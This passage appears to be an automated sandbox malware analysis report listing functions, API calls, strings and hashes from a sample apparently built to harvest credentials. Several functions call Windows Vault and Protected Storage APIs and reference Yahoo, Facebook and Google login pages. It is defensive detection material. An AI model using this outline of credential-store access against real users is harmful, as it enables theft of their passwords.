                                                                                                                                                                        • String ID: PStoreCreateInstance$pstorec.dll
                                                                                                                                                                        • API String ID: 145871493-2881415372
                                                                                                                                                                        • Opcode ID: fdc831568e2784af9de8c5a906fe078fe08317c6051ed8042a8c169ffd09e9de
                                                                                                                                                                        • Instruction ID: 165486c3e6602412b12b5041488cd1e6311a4fd56e7abe132b6c53b1702dbca2
                                                                                                                                                                        • Opcode Fuzzy Hash: fdc831568e2784af9de8c5a906fe078fe08317c6051ed8042a8c169ffd09e9de
                                                                                                                                                                        • Instruction Fuzzy Hash: D8F0E2302807125BEB206F76DC06B9B32D8AF44B4AF10C43EA052D55C1EBBCD4808B9D
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00444E7A Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ??3@
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 613200358-0
                                                                                                                                                                        • Opcode ID: 6dc2ae8407accaec33e914c995c073318a836f74cf280773562707ce9086f27d
                                                                                                                                                                        • Instruction ID: 83d98c8e739894f4f11ae52403c2f1a0732df397c2cb69f7507dcdbda06e161a
                                                                                                                                                                        • Opcode Fuzzy Hash: 6dc2ae8407accaec33e914c995c073318a836f74cf280773562707ce9086f27d
                                                                                                                                                                        • Instruction Fuzzy Hash: F7E04DA070030136BB20AFBAFD44B0323CC3A90793326482FB406D73D2EE2CE840A52C
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0043A0F8 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 967COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043A1CA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset
                                                                                                                                                                        • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                                        • API String ID: 2221118986-1725073988
                                                                                                                                                                        • Opcode ID: a02f6a0a02fcd16c7aa4dd96e86c2c528519a914f69e8e6aa23dcbcbdf6080a7
                                                                                                                                                                        • Instruction ID: e3eeb75a8af282f970fbf78469263b11f6465a284568bf7e48a5e115ce459d1a
                                                                                                                                                                        • Opcode Fuzzy Hash: a02f6a0a02fcd16c7aa4dd96e86c2c528519a914f69e8e6aa23dcbcbdf6080a7
                                                                                                                                                                        • Instruction Fuzzy Hash: F1828771A00208AFDF24DF69C881AAE7BA1FF08314F14411AFD559B3A2D77AEC51CB95
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040B25F Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ??2@
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1033339047-0
                                                                                                                                                                        • Opcode ID: 7383806280aca4e1821e19982c5cfbbe854b0cbcf0857156c862d8a82c6a6e7a
                                                                                                                                                                        • Instruction ID: 41d6ca53bbc25777d15e7d44d7af272a9a829ad4135043ac9a1f5f7c0c786f2e
                                                                                                                                                                        • Opcode Fuzzy Hash: 7383806280aca4e1821e19982c5cfbbe854b0cbcf0857156c862d8a82c6a6e7a
                                                                                                                                                                        • Instruction Fuzzy Hash: ED0112F12023007FEB69DF38ED1772A66949B95393F00413FA506CD2F6EA79D5449B08
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004444B7 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 121COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 004443B0: LoadLibraryW.KERNELBASE(vaultcli.dll,?,00000000), ref: 004443BD
                                                                                                                                                                          • Part of subcall function 004443B0: GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 004443D2
                                                                                                                                                                          • Part of subcall function 004443B0: GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 004443DF
                                                                                                                                                                          • Part of subcall function 004443B0: GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 004443EC
                                                                                                                                                                          • Part of subcall function 004443B0: GetProcAddress.KERNEL32(00000000,VaultFree), ref: 004443F9
                                                                                                                                                                          • Part of subcall function 004443B0: GetProcAddress.KERNEL32(00000000,VaultGetInformation), ref: 00444406
                                                                                                                                                                          • Part of subcall function 004443B0: GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 00444414
                                                                                                                                                                          • Part of subcall function 004443B0: GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 0044441D
                                                                                                                                                                        • memcmp.MSVCRT ref: 0044455D
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$LibraryLoadmemcmp
                                                                                                                                                                        • String ID: $$8
                                                                                                                                                                        • API String ID: 2708812716-435121686
                                                                                                                                                                        • Opcode ID: 201099f9feb607c4c8b0fa66378feea82f4e3e51204f541575a2dd3d377ec3c8
                                                                                                                                                                        • Instruction ID: 4b210d59022fde833576912f2e87238d6fd1d6b03e73e285368f71a5ac649bda
                                                                                                                                                                        • Opcode Fuzzy Hash: 201099f9feb607c4c8b0fa66378feea82f4e3e51204f541575a2dd3d377ec3c8
                                                                                                                                                                        • Instruction Fuzzy Hash: 73411171E00609ABEF10DF95C981BAFB7F4AF88714F11055AE915B3341DB78AE448BA4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040A7DA Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00403C2A: LoadLibraryW.KERNEL32(advapi32.dll,?,0040A9C2,?,https://login.yahoo.com/config/login,00000000,http://www.facebook.com/,00000000,https://www.google.com/accounts/servicelogin,00000000,?,00000000,?,00411E75,?,?), ref: 00403C35
                                                                                                                                                                          • Part of subcall function 00403C2A: GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00403C49
                                                                                                                                                                          • Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00403C55
                                                                                                                                                                          • Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptCreateHash), ref: 00403C61
                                                                                                                                                                          • Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptGetHashParam), ref: 00403C6D
                                                                                                                                                                          • Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptHashData), ref: 00403C79
                                                                                                                                                                          • Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptDestroyHash), ref: 00403C85
                                                                                                                                                                        • wcslen.MSVCRT ref: 0040A819
                                                                                                                                                                        • memset.MSVCRT ref: 0040A898
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$LibraryLoadmemsetwcslen
                                                                                                                                                                        • String ID: P5@
                                                                                                                                                                        • API String ID: 1960736289-1192260740
                                                                                                                                                                        • Opcode ID: 20a957c6aa2ccba46100227cc7926e2e9aca7a542005eb85cce3c7ff41f048fe
                                                                                                                                                                        • Instruction ID: 9cce22c2db06112b06b017d7de527652cc15472bfd2168745658b7e1f8ccbd38
                                                                                                                                                                        • Opcode Fuzzy Hash: 20a957c6aa2ccba46100227cc7926e2e9aca7a542005eb85cce3c7ff41f048fe
                                                                                                                                                                        • Instruction Fuzzy Hash: CC31D272500208AFDF10EFA4CC85DEE77B9AF48304F15887AF505F7281D638AE198B66
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00416F08 Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00416E8B: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00416EAC
                                                                                                                                                                          • Part of subcall function 00416E8B: GetLastError.KERNEL32 ref: 00416EBD
                                                                                                                                                                          • Part of subcall function 00416E8B: GetLastError.KERNEL32 ref: 00416EC3
                                                                                                                                                                        • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00416F38
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00416F42
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast$File$PointerRead
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 839530781-0
                                                                                                                                                                        • Opcode ID: 3e8702d37d071127fc233bfbf67a625d2feb83188ba54958d653ceabaac702fa
                                                                                                                                                                        • Instruction ID: add61fd64035c303a46c69afbbac6c0b4560a134b5de48ff3df98cfac7bf87f9
                                                                                                                                                                        • Opcode Fuzzy Hash: 3e8702d37d071127fc233bfbf67a625d2feb83188ba54958d653ceabaac702fa
                                                                                                                                                                        • Instruction Fuzzy Hash: 2D01AD3A208208BBEB108F65EC45FEA3B6CEF053A4F114426F908C6250D724EC9186E9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040A37F Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcslen$FileFindFirst
                                                                                                                                                                        • String ID: *.*$index.dat
                                                                                                                                                                        • API String ID: 1858513025-2863569691
                                                                                                                                                                        • Opcode ID: 9238a7d079e1375fbfde003b790de4053d9ee43c5394c8ca1f03ef328d3985c3
                                                                                                                                                                        • Instruction ID: 18b6580ac0a830e75170eb0e1623f763ef95ee80692c464e75bb199377268105
                                                                                                                                                                        • Opcode Fuzzy Hash: 9238a7d079e1375fbfde003b790de4053d9ee43c5394c8ca1f03ef328d3985c3
                                                                                                                                                                        • Instruction Fuzzy Hash: 20016D7140526859EB20EA61DC42ADE726CAF04304F5001BBA818F21C2EB789F929F5A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00416E8B Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00416EAC
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00416EBD
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00416EC3
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast$FilePointer
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1156039329-0
                                                                                                                                                                        • Opcode ID: 850b182fd2585f694b2736305c6ca07a69ca9fa842c0c1da9be3e232dd73cee9
                                                                                                                                                                        • Instruction ID: 37b1e2f091545ca96408f8d6a34600ec4a403a46a608ba1f9fdc83bbdb8077e2
                                                                                                                                                                        • Opcode Fuzzy Hash: 850b182fd2585f694b2736305c6ca07a69ca9fa842c0c1da9be3e232dd73cee9
                                                                                                                                                                        • Instruction Fuzzy Hash: F4F06536914619BBCF009F74DC009EA7BE8EB05361B104726F832D62D1E731EE419A94
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004080FD Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetTempPathW.KERNEL32(00000104,?,?), ref: 00408114
                                                                                                                                                                        • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00408126
                                                                                                                                                                        • GetTempFileNameW.KERNELBASE(?,004029F6,00000000,?), ref: 0040813D
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1125800050-0
                                                                                                                                                                        • Opcode ID: cd2f3735bba2878a79e9f19a3eb817c818f21bd1f1f6eaeb7cc68637a741f96c
                                                                                                                                                                        • Instruction ID: a19870345f686364ec187dd7d23bdf0954ef371c81d74b5a6631b0975d4c9c24
                                                                                                                                                                        • Opcode Fuzzy Hash: cd2f3735bba2878a79e9f19a3eb817c818f21bd1f1f6eaeb7cc68637a741f96c
                                                                                                                                                                        • Instruction Fuzzy Hash: BDE0927A900328BBDF205B60DC0CFCB377CEF46304F000070B945E6152EA7896888BA8
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004080AC Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • malloc.MSVCRT ref: 004080C8
                                                                                                                                                                        • memcpy.MSVCRT ref: 004080E0
                                                                                                                                                                        • free.MSVCRT(00000000,00000000,?,00408F0C,00000002,?,00000000,?,0040923F,00000000,?,00000000), ref: 004080E9
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: freemallocmemcpy
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3056473165-0
                                                                                                                                                                        • Opcode ID: b35ef3f807938d4c0a098e15bd5b29d1098e3b6b761d1f171dd30fe06938ab32
                                                                                                                                                                        • Instruction ID: 78eaf63d8c2f3f9895426ca65e1500e544e2a4a90d5a49d0f549448db46f5a47
                                                                                                                                                                        • Opcode Fuzzy Hash: b35ef3f807938d4c0a098e15bd5b29d1098e3b6b761d1f171dd30fe06938ab32
                                                                                                                                                                        • Instruction Fuzzy Hash: 50F0E2726052229FD718EE75BA8180BB39DAF85364712883FF444E3282DF3C9C44C7A8
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040897D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • ReadFile.KERNELBASE(?,?,CCD,00000000,00000000,?,?,00444343,00000000,00000000), ref: 00408994
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileRead
                                                                                                                                                                        • String ID: CCD
                                                                                                                                                                        • API String ID: 2738559852-662205380
                                                                                                                                                                        • Opcode ID: 95fe6112964d8fece6e22643851d15c8512762a174cc85b994d828cd4959b37f
                                                                                                                                                                        • Instruction ID: 69216e87a8676b039392231de9c3b52b74dec2ebcb54b9129181f8e0c6c75afe
                                                                                                                                                                        • Opcode Fuzzy Hash: 95fe6112964d8fece6e22643851d15c8512762a174cc85b994d828cd4959b37f
                                                                                                                                                                        • Instruction Fuzzy Hash: 6CD0C93541020DFBDF01CF80DC06FDD7BBDEB05359F108054BA0095160C7759A10AB54
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00436ADD Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 242COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: d
                                                                                                                                                                        • API String ID: 0-2564639436
                                                                                                                                                                        • Opcode ID: 57876eaa3a191597bfab1e7f39998f19745de974ac05e3c4f75a78f05ee54f6b
                                                                                                                                                                        • Instruction ID: fc4515617b89e60a19d50c15f4f69ae244da8edec6c232cce581781c6edd6396
                                                                                                                                                                        • Opcode Fuzzy Hash: 57876eaa3a191597bfab1e7f39998f19745de974ac05e3c4f75a78f05ee54f6b
                                                                                                                                                                        • Instruction Fuzzy Hash: 5981B031608312AFCB10DF19D84165FBBE0EF88718F12992FF8949B251D778DA45CB9A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0041E7EE Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset
                                                                                                                                                                        • String ID: BINARY
                                                                                                                                                                        • API String ID: 2221118986-907554435
                                                                                                                                                                        • Opcode ID: d19efc801e877f0ce795817df0e0cc72f0fc1a5f5a7d27e56dc3ca5837767e46
                                                                                                                                                                        • Instruction ID: 80603cce4df8086f4253f53369ac634731a2704b4a2dc635bb3c7b15e71801b6
                                                                                                                                                                        • Opcode Fuzzy Hash: d19efc801e877f0ce795817df0e0cc72f0fc1a5f5a7d27e56dc3ca5837767e46
                                                                                                                                                                        • Instruction Fuzzy Hash: B951AD75A043459FDB21DF2AC881BEA7BE4EF48350F14446AEC89CB341D738D980CBA9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040DD37 Relevance: 3.1, APIs: 2, Instructions: 140COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0040C513: ??2@YAPAXI@Z.MSVCRT ref: 0040C534
                                                                                                                                                                          • Part of subcall function 0040C513: ??3@YAXPAX@Z.MSVCRT ref: 0040C5FB
                                                                                                                                                                        • GetStdHandle.KERNEL32(000000F5,?,0040FF40,00000000,00000000,?,00000000,00000000,00000000), ref: 0040DD6C
                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(00000000,?,0040FF40,00000000,00000000,?,00000000,00000000,00000000), ref: 0040DE90
                                                                                                                                                                          • Part of subcall function 00407D94: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040DD67,00000000,?,0040FF40,00000000,00000000,?,00000000,00000000), ref: 00407DA6
                                                                                                                                                                          • Part of subcall function 00407DF4: GetLastError.KERNEL32(00000000,?,0040DEA5,00000000,?,0040FF40,00000000,00000000,?,00000000,00000000,00000000), ref: 00407E08
                                                                                                                                                                          • Part of subcall function 00407DF4: _snwprintf.MSVCRT ref: 00407E35
                                                                                                                                                                          • Part of subcall function 00407DF4: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00407E4E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1161345128-0
                                                                                                                                                                        • Opcode ID: 3d3b21ef697afd0bdb833f204540dd718a0a6addb83a3789607b508d28bd4cbe
                                                                                                                                                                        • Instruction ID: 75199abba107ca30350ead5857dca6b94cadfdfaeaa302ec2f3d27d1e62cce92
                                                                                                                                                                        • Opcode Fuzzy Hash: 3d3b21ef697afd0bdb833f204540dd718a0a6addb83a3789607b508d28bd4cbe
                                                                                                                                                                        • Instruction Fuzzy Hash: BD417F35E00604EBCB219FA9C885A5EB7B6AF54714F20406FF446AB2D1CB389E44DA99
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040FE76 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcsicmp
                                                                                                                                                                        • String ID: /stext
                                                                                                                                                                        • API String ID: 2081463915-3817206916
                                                                                                                                                                        • Opcode ID: a01bfb8d808dbe57cbee4fd70ed2a4dbf1f3eb0a587578e83f1d012f6d402b9a
                                                                                                                                                                        • Instruction ID: 2161babe09ea1c109a016804ff5c091d56ac672142073ac0305c405afa28cd18
                                                                                                                                                                        • Opcode Fuzzy Hash: a01bfb8d808dbe57cbee4fd70ed2a4dbf1f3eb0a587578e83f1d012f6d402b9a
                                                                                                                                                                        • Instruction Fuzzy Hash: 37216074B00205AFD714EFAAC881A9DB7A9FF84304F1001BFA415A7782DB79AD148B95
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00414C1D Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 26COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        • failed to allocate %u bytes of memory, xrefs: 00414C46
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: malloc
                                                                                                                                                                        • String ID: failed to allocate %u bytes of memory
                                                                                                                                                                        • API String ID: 2803490479-1168259600
                                                                                                                                                                        • Opcode ID: 37a0e16a31e73fb3f1329956b653d3eb145f9cbc4939c84207ade25bbdcda1f4
                                                                                                                                                                        • Instruction ID: cc16955a0d14ca8776a7aa5b229d79c98c920de21d1adc6b7d8c4ece6c284845
                                                                                                                                                                        • Opcode Fuzzy Hash: 37a0e16a31e73fb3f1329956b653d3eb145f9cbc4939c84207ade25bbdcda1f4
                                                                                                                                                                        • Instruction Fuzzy Hash: 64E020B7F0361267C2004615DC0168777959FD132171B0637F95CD3680D63CD84587A9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00416ED2 Relevance: 3.0, APIs: 2, Instructions: 24sleepCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • Sleep.KERNEL32(00000064), ref: 00416EEB
                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(0CC483FF,00000000,00000000,004536AC,0041753F,00000008,00000000,00000000,?,004176FC,?,00000000), ref: 00416EF4
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ChangeCloseFindNotificationSleep
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1821831730-0
                                                                                                                                                                        • Opcode ID: cc2e2d56278e834b5826f7bb8f80f5f4d654d385e6d95c8a2fc1f4074e09f098
                                                                                                                                                                        • Instruction ID: ddbdeb719d62bbcd0ae2c24f8bc232808eb7cee6ac061654c4d164212cdc0068
                                                                                                                                                                        • Opcode Fuzzy Hash: cc2e2d56278e834b5826f7bb8f80f5f4d654d385e6d95c8a2fc1f4074e09f098
                                                                                                                                                                        • Instruction Fuzzy Hash: 35E0C23F11071A9FDB0097BCDC90AD773D8EF56338726433AF662C61A0CA65D8828654
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0041B556 Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcmpmemset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1065087418-0
                                                                                                                                                                        • Opcode ID: 9b44e04d39c850c09dfc470b21759ac07039072516198818df3f324f61dd621a
                                                                                                                                                                        • Instruction ID: 1efd5175aaeb232b83b4fa12f0066e98a2b2c589ef3b7fe000d2c80dadf29316
                                                                                                                                                                        • Opcode Fuzzy Hash: 9b44e04d39c850c09dfc470b21759ac07039072516198818df3f324f61dd621a
                                                                                                                                                                        • Instruction Fuzzy Hash: AF617C71A01245EFDB10EFA485C06EEB7B4FB54308F14846FE11497281E738AED59B9A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

